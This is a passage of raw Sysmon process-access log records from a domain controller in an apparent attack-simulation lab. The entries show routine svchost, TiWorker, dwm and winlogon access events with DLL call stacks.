12:02:09.910{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004059Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:09.910{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004058Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:09.910{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004057Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:09.910{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004056Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:09.910{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004055Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:09.910{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004054Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:09.894{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000004053Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:09.894{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000004052Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:09.894{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004051Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:09.894{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004050Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:09.894{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004049Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:09.878{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004048Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:09.878{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004047Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:09.878{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004046Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:09.878{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004045Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:09.878{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004044Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:09.878{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004043Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:09.878{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004042Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:09.878{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004041Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:09.878{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004040Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:09.863{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-64C1-6064-9400-00000000AE01}984C:\Windows\system32\dwm.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004039Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:09.847{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-64C1-6064-9400-00000000AE01}984C:\Windows\system32\dwm.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004038Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:09.847{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-64C1-6064-9400-00000000AE01}984C:\Windows\system32\dwm.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004037Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:09.754{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-64C1-6064-9200-00000000AE01}2552C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ec